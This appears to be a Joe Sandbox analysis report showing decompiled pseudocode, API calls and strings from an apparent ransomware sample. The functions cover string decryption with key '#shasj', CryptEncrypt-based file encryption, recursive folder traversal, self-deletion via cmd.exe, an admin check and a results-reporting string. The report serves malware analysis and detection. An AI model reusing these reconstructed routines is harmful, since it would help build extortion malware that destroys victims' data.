                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC657FF
                                        • lstrlenA.KERNEL32(00000000,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC65818
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC65850
                                        • VirtualFree.KERNEL32(?,00000000,00008000,?,?,?,?,?,00000000,00000000,?,00000000), ref: 0FC65867
                                        Strings
                                        • #shasj, xrefs: 0FC65720
                                        • action=result&e_files=%d&e_size=%I64u&e_time=%d&, xrefs: 0FC656B7
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen$Virtual$AllocFree$BinaryCryptErrorLastString_memsetwsprintf
                                        • String ID: #shasj$action=result&e_files=%d&e_size=%I64u&e_time=%d&
                                        • API String ID: 2994799111-4131875188
                                        • Opcode ID: dde2b428210391c5ab5bd8fc7eff36544519c1f0e260d2019b05f46e1f58f27a
                                        • Instruction ID: 4fcbdb20bdf15d6a47c4ef7e20d4c99dea919ac9b9cc8be2d5c431b7d1582c52
                                        • Opcode Fuzzy Hash: dde2b428210391c5ab5bd8fc7eff36544519c1f0e260d2019b05f46e1f58f27a
                                        • Instruction Fuzzy Hash: E951E471908219BBEB20DB65DC86FEE7B79EF44300F140068EA05B7181EB746A14CB95
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC65210 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 145memorystringencryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 73%
                                        			E0FC65210(CHAR* __ecx, CHAR** __edx) {
				int _v8;
				long _v12;
				char _v14;
				void* _v16;
				void* _v20;
				void* _v24;
				char _v28;
				CHAR** _v32;
				void* _v36;
				char _v291;
				char _v292;
				void* _v348;
				void* _v352;
				int _t43;
				BYTE* _t44;
				int _t46;
				void* _t50;
				void* _t51;
				char _t52;
				void* _t64;
				signed int _t66;
				signed int _t68;
				int _t69;
				int _t72;
				char _t74;
				intOrPtr _t75;
				CHAR* _t84;
				char* _t86;
				void* _t88;
				signed char _t89;
				WCHAR* _t94;
				CHAR* _t95;
				BYTE* _t101;
				WCHAR* _t102;
				WCHAR* _t103;
				void* _t104;
				long _t105;
				long _t106;
				int _t107;
				void* _t108;
				CHAR* _t109;
				void* _t110;

				_t86 = __ecx;
				_v32 = __edx;
				_t43 = lstrlenA(__ecx) + 1;
				_v8 = _t43;
				_t3 = _t43 + 1; // 0x2
				_t105 = _t3;
				_t44 = VirtualAlloc(0, _t105, 0x3000, 0x40);
				_v36 = _t44;
				if(_t44 == 0 || _v8 >= _t105) {
					_t101 = 0;
					__eflags = 0;
				} else {
					_t101 = _t44;
				}
				_t106 = 0;
				_t46 = CryptStringToBinaryA(_t86, 0, 1, _t101,  &_v8, 0, 0);
				_t119 = _t46;
				if(_t46 == 0) {
					GetLastError();
					goto L14;
				} else {
					_t50 = "#shasj"; // 0x61687323
					asm("movq xmm0, [0xfc6fc78]");
					_t107 = _v8;
					_v20 = _t50;
					_t51 =  *0xfc6fc84; // 0x6a73
					_v16 = _t51;
					_t52 =  *0xfc6fc86; // 0x0
					_v14 = _t52;
					asm("movq [ebp-0x18], xmm0");
					_v292 = 0;
					E0FC69010( &_v291, 0, 0xff);
					E0FC65D70( &_v292,  &_v28, lstrlenA( &_v28));
					E0FC65E20( &_v292, _t101, _t107);
					_t94 =  &_v28;
					asm("xorps xmm0, xmm0");
					asm("movdqu [ebp-0x18], xmm0");
					E0FC633E0(_t94, _t119, _t101);
					if(_v28 != 0) {
						E0FC65190();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(lstrlenA);
						_push(_t107);
						_push(_t101);
						_t102 = _t94;
						_t108 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
						_v352 = _t108;
						GetModuleFileNameW(0, _t108, 0x200);
						_t88 = CreateFileW(_t108, 0x80000000, 1, 0, 3, 0x80, 0);
						_v348 = _t88;
						__eflags = _t88 - 0xffffffff;
						if(_t88 != 0xffffffff) {
							_t64 = CreateFileMappingW(_t88, 0, 8, 0, 0, 0);
							_v28 = _t64;
							__eflags = _t64;
							if(_t64 != 0) {
								_t66 = MapViewOfFile(_t64, 1, 0, 0, 0);
								_v16 = _t66;
								__eflags = _t66;
								if(_t66 != 0) {
									_t29 = _t66 + 0x4e; // 0x4e
									_t109 = _t29;
									_v12 = _t109;
									_t68 = lstrlenW(_t102);
									_t89 = 0;
									_t103 =  &(_t102[_t68]);
									_t69 = lstrlenA(_t109);
									__eflags = _t69 + _t69;
									if(_t69 + _t69 != 0) {
										_t95 = _t109;
										do {
											__eflags = _t89 & 0x00000001;
											if((_t89 & 0x00000001) != 0) {
												 *((char*)(_t103 + _t89)) = 0;
											} else {
												_t74 =  *_t109;
												_t109 =  &(_t109[1]);
												 *((char*)(_t103 + _t89)) = _t74;
											}
											_t89 = _t89 + 1;
											_t72 = lstrlenA(_t95);
											_t95 = _v12;
											__eflags = _t89 - _t72 + _t72;
										} while (_t89 < _t72 + _t72);
									}
									UnmapViewOfFile(_v16);
									_t88 = _v20;
									_t108 = _v24;
								}
								CloseHandle(_v28);
							}
							CloseHandle(_t88);
						}
						return VirtualFree(_t108, 0, 0x8000);
					} else {
						_t104 = _v24;
						_t75 =  *0xfc72a60; // 0x0
						_t110 = _v20;
						_t76 =  !=  ? 0 : _t75;
						_v12 = 1;
						 *0xfc72a60 =  !=  ? 0 : _t75;
						if(_t110 != 0) {
							_t84 = VirtualAlloc(0, lstrlenA(_t110) + 1, 0x3000, 4);
							 *_v32 = _t84;
							if(_t84 != 0) {
								lstrcpyA(_t84, _t110);
							}
						}
						_t77 = GetProcessHeap;
						if(_t104 != 0) {
							HeapFree(GetProcessHeap(), 0, _t104);
							_t77 = GetProcessHeap;
						}
						if(_t110 != 0) {
							HeapFree( *_t77(), 0, _t110);
						}
						_t106 = _v12;
						L14:
						VirtualFree(_v36, 0, 0x8000);
						return _t106;
					}
				}
			}













































                                        0x0fc6521c
                                        0x0fc6521e
                                        0x0fc65228
                                        0x0fc65230
                                        0x0fc65233
                                        0x0fc65233
                                        0x0fc65239
                                        0x0fc6523f
                                        0x0fc65244
                                        0x0fc6524f
                                        0x0fc6524f
                                        0x0fc6524b
                                        0x0fc6524b
                                        0x0fc6524b
                                        0x0fc65251
                                        0x0fc6525e
                                        0x0fc65264
                                        0x0fc65266
                                        0x0fc65385
                                        0x00000000
                                        0x0fc6526c
                                        0x0fc6526c
                                        0x0fc65271
                                        0x0fc65279
                                        0x0fc6527c
                                        0x0fc6527f
                                        0x0fc65285
                                        0x0fc65289
                                        0x0fc65293
                                        0x0fc6529f
                                        0x0fc652a4
                                        0x0fc652ab
                                        0x0fc652c9
                                        0x0fc652d7
                                        0x0fc652df
                                        0x0fc652e2
                                        0x0fc652e5
                                        0x0fc652eb
                                        0x0fc652f4
                                        0x0fc6538d
                                        0x0fc65392
                                        0x0fc65393
                                        0x0fc65394
                                        0x0fc65395
                                        0x0fc65396
                                        0x0fc65397
                                        0x0fc65398
                                        0x0fc65399
                                        0x0fc6539a
                                        0x0fc6539b
                                        0x0fc6539c
                                        0x0fc6539d
                                        0x0fc6539e
                                        0x0fc6539f
                                        0x0fc653a6
                                        0x0fc653a7
                                        0x0fc653a8
                                        0x0fc653b7
                                        0x0fc653bf
                                        0x0fc653c9
                                        0x0fc653cc
                                        0x0fc653eb
                                        0x0fc653ed
                                        0x0fc653f0
                                        0x0fc653f3
                                        0x0fc65404
                                        0x0fc6540a
                                        0x0fc6540d
                                        0x0fc6540f
                                        0x0fc6541a
                                        0x0fc65420
                                        0x0fc65423
                                        0x0fc65425
                                        0x0fc65427
                                        0x0fc65427
                                        0x0fc6542b
                                        0x0fc6542e
                                        0x0fc65435
                                        0x0fc65437
                                        0x0fc6543a
                                        0x0fc65440
                                        0x0fc65442
                                        0x0fc65444
                                        0x0fc65446
                                        0x0fc65446
                                        0x0fc65449
                                        0x0fc65453
                                        0x0fc6544b
                                        0x0fc6544b
                                        0x0fc6544d
                                        0x0fc6544e
                                        0x0fc6544e
                                        0x0fc65458
                                        0x0fc65459
                                        0x0fc6545f
                                        0x0fc65464
                                        0x0fc65464
                                        0x0fc65446
                                        0x0fc6546b
                                        0x0fc65471
                                        0x0fc65474
                                        0x0fc65474
                                        0x0fc6547a
                                        0x0fc6547a
                                        0x0fc65481
                                        0x0fc65481
                                        0x0fc6549b
                                        0x0fc652fa
                                        0x0fc652fa
                                        0x0fc652ff
                                        0x0fc65306
                                        0x0fc65309
                                        0x0fc6530c
                                        0x0fc65313
                                        0x0fc6531a
                                        0x0fc6532a
                                        0x0fc65333
                                        0x0fc65337
                                        0x0fc6533b
                                        0x0fc6533b
                                        0x0fc65337
                                        0x0fc65347
                                        0x0fc6534e
                                        0x0fc65356
                                        0x0fc65358
                                        0x0fc65358
                                        0x0fc6535f
                                        0x0fc65367
                                        0x0fc65367
                                        0x0fc65369
                                        0x0fc6536c
                                        0x0fc65376
                                        0x0fc65384
                                        0x0fc65384
                                        0x0fc652f4

                                        APIs
                                        • lstrlenA.KERNEL32(?,00000001,?,?), ref: 0FC65222
                                        • VirtualAlloc.KERNEL32(00000000,00000002,00003000,00000040), ref: 0FC65239
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 0FC6525E
                                        • _memset.LIBCMT ref: 0FC652AB
                                        • lstrlenA.KERNEL32(?), ref: 0FC652BD
                                        • lstrlenA.KERNEL32(?,00003000,00000004,00000000), ref: 0FC65324
                                        • VirtualAlloc.KERNEL32(00000000,00000001), ref: 0FC6532A
                                        • lstrcpyA.KERNEL32(00000000,?), ref: 0FC6533B
                                        • HeapFree.KERNEL32(00000000), ref: 0FC65356
                                        • HeapFree.KERNEL32(00000000), ref: 0FC65367
                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FC65376
                                        • GetLastError.KERNEL32 ref: 0FC65385
                                          • Part of subcall function 0FC65190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0FC65392,00000000), ref: 0FC651A6
                                          • Part of subcall function 0FC65190: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FC651B8
                                          • Part of subcall function 0FC65190: GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0FC651C8
                                          • Part of subcall function 0FC65190: wsprintfW.USER32 ref: 0FC651D9
                                          • Part of subcall function 0FC65190: ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0FC651F3
                                          • Part of subcall function 0FC65190: ExitProcess.KERNEL32 ref: 0FC651FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$Alloc$Freelstrlen$Heap$BinaryCryptErrorExecuteExitFileLastModuleNameProcessShellString_memsetlstrcpywsprintf
                                        • String ID: #shasj
                                        • API String ID: 834684195-2423951532
                                        • Opcode ID: 0c3cc4eb0e87f7997819e6cb2728155bc04038f3528bba2e5744c4c323a0da47
                                        • Instruction ID: 798d779e5576aa5559dbbae316e236aa952f16ef2bfa1746325060b710f34c12
                                        • Opcode Fuzzy Hash: 0c3cc4eb0e87f7997819e6cb2728155bc04038f3528bba2e5744c4c323a0da47
                                        • Instruction Fuzzy Hash: 7A41B77190821AEFDB109FA5DC86BEFBB78EF48711F140515EA05F7281DB789A50CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC66530 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 89encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 54%
                                        			E0FC66530(BYTE* _a4, int _a8, int _a12, intOrPtr* _a16, intOrPtr _a20) {
				long* _v8;
				long* _v12;
				int _v16;
				char _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long** _t26;
				char* _t31;
				int _t33;
				long _t36;

				EnterCriticalSection(0xfc72a48);
				_v8 = 0;
				_v12 = 0;
				_t26 =  &_v8;
				__imp__CryptAcquireContextW(_t26, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 0);
				if(_t26 != 0) {
					L6:
					_v16 = 0;
					if(CryptImportKey(_v8, _a4, _a8, 0, 0,  &_v12) != 0) {
						_v20 = 0xa;
						_t31 =  &_v20;
						__imp__CryptGetKeyParam(_v12, 8,  &_v28, _t31, 0);
						_v32 = _t31;
						 *_a16 = 0xc8;
						_t33 = _a12;
						__imp__CryptEncrypt(_v12, 0, 1, 0, _t33, _a16, _a20);
						_v16 = _t33;
						_v24 = GetLastError();
						if(_v16 == 0) {
							E0FC634F0(_t34);
						}
					}
					CryptReleaseContext(_v8, 0);
					LeaveCriticalSection(0xfc72a48);
					return _v16;
				}
				_t36 = GetLastError();
				if(_t36 != 0x80090016) {
					return 0;
				}
				__imp__CryptAcquireContextW( &_v8, 0, L"Microsoft Enhanced Cryptographic Provider v1.0", 1, 8);
				if(_t36 != 0) {
					goto L6;
				}
				return 0;
			}














                                        0x0fc6653b
                                        0x0fc66541
                                        0x0fc66548
                                        0x0fc6655a
                                        0x0fc6655e
                                        0x0fc66566
                                        0x0fc6659e
                                        0x0fc6659e
                                        0x0fc665c1
                                        0x0fc665c3
                                        0x0fc665cc
                                        0x0fc665da
                                        0x0fc665e0
                                        0x0fc665e6
                                        0x0fc665f4
                                        0x0fc66602
                                        0x0fc66608
                                        0x0fc66611
                                        0x0fc66618
                                        0x0fc6661d
                                        0x0fc6661d
                                        0x0fc66618
                                        0x0fc66628
                                        0x0fc66633
                                        0x00000000
                                        0x0fc66639
                                        0x0fc66568
                                        0x0fc66573
                                        0x00000000
                                        0x0fc66597
                                        0x0fc66584
                                        0x0fc6658c
                                        0x00000000
                                        0x0fc66595
                                        0x00000000

                                        APIs
                                        • EnterCriticalSection.KERNEL32(0FC72A48,?,0FC63724,00000000,00000000,00000000,?,00000800), ref: 0FC6653B
                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,?,0FC63724,00000000,00000000,00000000), ref: 0FC6655E
                                        • GetLastError.KERNEL32(?,0FC63724,00000000,00000000,00000000), ref: 0FC66568
                                        • CryptAcquireContextW.ADVAPI32(00000000,00000000,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008,?,0FC63724,00000000,00000000,00000000), ref: 0FC66584
                                        • CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,0FC63724,00000000,00000000), ref: 0FC665B9
                                        • CryptGetKeyParam.ADVAPI32(00000000,00000008,0FC63724,0000000A,00000000,?,0FC63724,00000000), ref: 0FC665DA
                                        • CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,0000000A,00000000,0FC63724,?,0FC63724,00000000), ref: 0FC66602
                                        • GetLastError.KERNEL32(?,0FC63724,00000000), ref: 0FC6660B
                                        • CryptReleaseContext.ADVAPI32(00000000,00000000,?,0FC63724,00000000,00000000), ref: 0FC66628
                                        • LeaveCriticalSection.KERNEL32(0FC72A48,?,0FC63724,00000000,00000000), ref: 0FC66633
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireCriticalErrorLastSection$EncryptEnterImportLeaveParamRelease
                                        • String ID: Microsoft Enhanced Cryptographic Provider v1.0
                                        • API String ID: 72144047-1948191093
                                        • Opcode ID: 8384f7902b5e4344987a7865998a47544679e1d50ebac90a47595b6658965b03
                                        • Instruction ID: 0f3e0c91069e60dbaae3cfdfae7653077503f25f1927d2b06ffe360e04cf3201
                                        • Opcode Fuzzy Hash: 8384f7902b5e4344987a7865998a47544679e1d50ebac90a47595b6658965b03
                                        • Instruction Fuzzy Hash: AE314575A5830ABBDB10DFA1DD87FDE77B8AB48701F104158F602BA180D779A610DF60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC66C90 Relevance: 13.6, APIs: 9, Instructions: 109stringfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 97%
                                        			E0FC66C90(void* __eax, WCHAR* __ecx, intOrPtr __edx, intOrPtr _a4, signed int* _a8, intOrPtr* _a12) {
				void* _v12;
				intOrPtr _v16;
				WCHAR* _v20;
				intOrPtr _v24;
				struct _WIN32_FIND_DATAW _v616;
				void* _t35;
				signed int _t37;
				int _t39;
				signed int _t42;
				void* _t46;
				signed int* _t48;
				WCHAR* _t53;
				intOrPtr* _t54;
				short _t57;
				WCHAR* _t63;
				void* _t67;

				_v24 = __edx;
				_t63 = __ecx;
				"SVWj@h"();
				if(__eax == 0 || E0FC66A40(__ecx) != 0) {
					L17:
					__eflags = 0;
					return 0;
				} else {
					E0FC66BE0(__ecx);
					_t53 =  &(_t63[lstrlenW(__ecx)]);
					_v20 = _t53;
					lstrcatW(_t63, "*");
					_t35 = FindFirstFileW(_t63,  &_v616);
					_t57 = 0;
					_v12 = _t35;
					 *_t53 = 0;
					if(_t35 != 0xffffffff) {
						_t54 = _a12;
						do {
							_t37 = lstrcmpW( &(_v616.cFileName), ".");
							__eflags = _t37;
							if(_t37 != 0) {
								_t42 = lstrcmpW( &(_v616.cFileName), L"..");
								__eflags = _t42;
								if(_t42 != 0) {
									lstrcatW(_t63,  &(_v616.cFileName));
									__eflags = _v616.dwFileAttributes & 0x00000010;
									if(__eflags == 0) {
										_v16 =  *_t54;
										_t46 = E0FC66950(_t63,  &_v616, __eflags, _t57, _a4);
										_t67 = _t67 + 8;
										 *_t54 =  *_t54 + _t46;
										asm("adc [ebx+0x4], edx");
										__eflags =  *((intOrPtr*)(_t54 + 4)) -  *((intOrPtr*)(_t54 + 4));
										if(__eflags <= 0) {
											if(__eflags < 0) {
												L12:
												_t48 = _a8;
												 *_t48 =  *_t48 + 1;
												__eflags =  *_t48;
											} else {
												__eflags = _v16 -  *_t54;
												if(_v16 <  *_t54) {
													goto L12;
												}
											}
										}
									} else {
										E0FC66C90(lstrcatW(_t63, "\\"), _t63, _v24, _a4, _a8, _t54);
										_t67 = _t67 + 0xc;
									}
									_t57 = 0;
									__eflags = 0;
									 *_v20 = 0;
								}
							}
							_t39 = FindNextFileW(_v12,  &_v616);
							__eflags = _t39;
						} while (_t39 != 0);
						FindClose(_v12);
						goto L17;
					} else {
						return 0xdeadbeaf;
					}
				}
			}



















                                        0x0fc66c9c
                                        0x0fc66c9f
                                        0x0fc66ca1
                                        0x0fc66ca8
                                        0x0fc66dd6
                                        0x0fc66dd6
                                        0x0fc66ddc
                                        0x0fc66cbd
                                        0x0fc66cbd
                                        0x0fc66cd5
                                        0x0fc66cd8
                                        0x0fc66cdb
                                        0x0fc66ce5
                                        0x0fc66ceb
                                        0x0fc66ced
                                        0x0fc66cf0
                                        0x0fc66cf6
                                        0x0fc66d04
                                        0x0fc66d10
                                        0x0fc66d1c
                                        0x0fc66d22
                                        0x0fc66d24
                                        0x0fc66d36
                                        0x0fc66d3c
                                        0x0fc66d3e
                                        0x0fc66d48
                                        0x0fc66d4a
                                        0x0fc66d51
                                        0x0fc66d82
                                        0x0fc66d85
                                        0x0fc66d8a
                                        0x0fc66d8d
                                        0x0fc66d8f
                                        0x0fc66d92
                                        0x0fc66d95
                                        0x0fc66d97
                                        0x0fc66da0
                                        0x0fc66da0
                                        0x0fc66da3
                                        0x0fc66da3
                                        0x0fc66d99
                                        0x0fc66d9c
                                        0x0fc66d9e
                                        0x00000000
                                        0x00000000
                                        0x0fc66d9e
                                        0x0fc66d97
                                        0x0fc66d53
                                        0x0fc66d67
                                        0x0fc66d6c
                                        0x0fc66d6c
                                        0x0fc66dae
                                        0x0fc66dae
                                        0x0fc66db0
                                        0x0fc66db0
                                        0x0fc66d3e
                                        0x0fc66dbd
                                        0x0fc66dc3
                                        0x0fc66dc3
                                        0x0fc66dce
                                        0x00000000
                                        0x0fc66cf8
                                        0x0fc66d03
                                        0x0fc66d03
                                        0x0fc66cf6

                                        APIs
                                          • Part of subcall function 0FC66640: VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66653
                                          • Part of subcall function 0FC66640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC666F2
                                          • Part of subcall function 0FC66640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC6670C
                                          • Part of subcall function 0FC66640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66726
                                          • Part of subcall function 0FC66640: SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66740
                                          • Part of subcall function 0FC66640: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0FC66CA6,00000000,?,?), ref: 0FC66760
                                          • Part of subcall function 0FC66A40: lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FC66A52
                                          • Part of subcall function 0FC66A40: lstrcatW.KERNEL32(00000000,0FC6FEC4), ref: 0FC66A64
                                          • Part of subcall function 0FC66A40: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FC66A72
                                          • Part of subcall function 0FC66A40: lstrcmpW.KERNEL32(?,0FC6FEC8,?,?), ref: 0FC66A9C
                                          • Part of subcall function 0FC66A40: lstrcmpW.KERNEL32(?,0FC6FECC,?,?), ref: 0FC66AB2
                                          • Part of subcall function 0FC66A40: lstrcatW.KERNEL32(00000000,?), ref: 0FC66AC4
                                          • Part of subcall function 0FC66A40: lstrlenW.KERNEL32(00000000,?,?), ref: 0FC66ACB
                                          • Part of subcall function 0FC66A40: lstrcmpW.KERNEL32(-00000001,.sql,?,?), ref: 0FC66AFA
                                          • Part of subcall function 0FC66A40: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?), ref: 0FC66B11
                                          • Part of subcall function 0FC66A40: GetFileSize.KERNEL32(00000000,00000000,?,?), ref: 0FC66B1C
                                          • Part of subcall function 0FC66A40: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?), ref: 0FC66B3A
                                          • Part of subcall function 0FC66A40: ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?), ref: 0FC66B4F
                                          • Part of subcall function 0FC66BE0: VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0FC66CC2,00000000,?,?), ref: 0FC66BF5
                                          • Part of subcall function 0FC66BE0: wsprintfW.USER32 ref: 0FC66C03
                                          • Part of subcall function 0FC66BE0: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0FC66C1F
                                          • Part of subcall function 0FC66BE0: GetLastError.KERNEL32(?,?), ref: 0FC66C2C
                                          • Part of subcall function 0FC66BE0: VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0FC66C78
                                        • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 0FC66CC3
                                        • lstrcatW.KERNEL32(00000000,0FC6FEC4), ref: 0FC66CDB
                                        • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 0FC66CE5
                                        • lstrcmpW.KERNEL32(?,0FC6FEC8,?,?), ref: 0FC66D1C
                                        • lstrcmpW.KERNEL32(?,0FC6FECC,?,?), ref: 0FC66D36
                                        • lstrcatW.KERNEL32(00000000,?), ref: 0FC66D48
                                        • lstrcatW.KERNEL32(00000000,0FC6FEFC), ref: 0FC66D59
                                        • FindNextFileW.KERNEL32(00003000,?,?,?), ref: 0FC66DBD
                                        • FindClose.KERNEL32(00003000,?,?), ref: 0FC66DCE
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Virtuallstrcatlstrcmp$FindFolderPathSpecial$Alloclstrlen$CreateFirstFree$CloseErrorLastNextReadSizewsprintf
                                        • String ID:
                                        • API String ID: 1112924665-0
                                        • Opcode ID: c9ce803a618146805e9846fd3961e570b02e52c7e37a0aa9188da984a0b31f83
                                        • Instruction ID: 2b9a5eb1a6908867084938e52c55f658516cd29b7dd24c6c808959066a2381b1
                                        • Opcode Fuzzy Hash: c9ce803a618146805e9846fd3961e570b02e52c7e37a0aa9188da984a0b31f83
                                        • Instruction Fuzzy Hash: 5731D971A0C21AEBCF14AF65DCC6AAD77B8FF44310B0041A5F905EB102EB35AA11EB60
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0FC63AA0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 43memorylibraryloaderCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 63%
                                        			E0FC63AA0() {
				signed int _v8;
				void* _v12;
				short _v16;
				struct _SID_IDENTIFIER_AUTHORITY _v20;
				int _t13;
				_Unknown_base(*)()* _t15;
				signed int _t16;

				_v20.Value = 0;
				_v16 = 0x500;
				_t13 = AllocateAndInitializeSid( &_v20, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v12);
				if(_t13 != 0) {
					_t15 = GetProcAddress(GetModuleHandleA("advapi32.dll"), "CheckTokenMembership");
					_t16 =  *_t15(0, _v12,  &_v8);
					asm("sbb eax, eax");
					_v8 = _v8 &  ~_t16;
					FreeSid(_v12);
					return _v8;
				} else {
					return _t13;
				}
			}










                                        0x0fc63aa9
                                        0x0fc63ac9
                                        0x0fc63ad0
                                        0x0fc63ad8
                                        0x0fc63aef
                                        0x0fc63afe
                                        0x0fc63b05
                                        0x0fc63b07
                                        0x0fc63b0a
                                        0x0fc63b16
                                        0x0fc63add
                                        0x0fc63add
                                        0x0fc63add

                                        APIs
                                        • AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0FC63AD0
                                        • GetModuleHandleA.KERNEL32(advapi32.dll), ref: 0FC63AE3
                                        • GetProcAddress.KERNEL32(00000000,CheckTokenMembership), ref: 0FC63AEF
                                        • FreeSid.ADVAPI32(?), ref: 0FC63B0A
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000001.00000002.537524053.000000000FC61000.00000020.00000001.01000000.00000003.sdmp, Offset: 0FC60000, based on PE: true
                                        • Associated: 00000001.00000002.537517635.000000000FC60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537541962.000000000FC6A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537565986.000000000FC72000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000001.00000002.537573813.000000000FC74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_1_2_fc60000_gI5xZdIxUs.jbxd
